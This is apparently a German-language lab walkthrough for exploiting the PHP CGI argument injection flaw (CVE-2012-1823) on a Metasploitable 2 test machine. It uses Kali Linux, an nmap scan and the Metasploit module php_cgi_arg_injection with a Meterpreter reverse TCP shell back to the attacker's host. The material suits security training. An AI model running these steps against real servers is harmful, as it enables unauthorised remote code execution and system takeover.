
In diesem Video wird die PHP CGI Argument Injection (CVE-2012-1823) Exploitation auf dem Metasploitable 2 Server mittels Kali Linux und Metasploit durchgeführt.
Ermitteln Sie die Metasploitable-IP von Kali:
ip a
Zum Beispiel:
Kali: 192.168.56.101
Metasploitable2: 192.168.56.102
Wir überprüfen Port und Dienst:
nmap -p 80 192.168.56.102
Auch im Browser überprüfbar:
msfconsole
search php cgi
Das richtige Modul:
use exploit/multi/http/php_cgi_arg_injection
set RHOSTS 192.168.56.102
set RPORT 80
set TARGETURI /
Payload auswählen:
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.56.101
set LPORT 4444
Wir überprüfen:
show options
run
oder
exploit
Bei Erfolg:
Meterpreter session 1 opened
sysinfo
whoami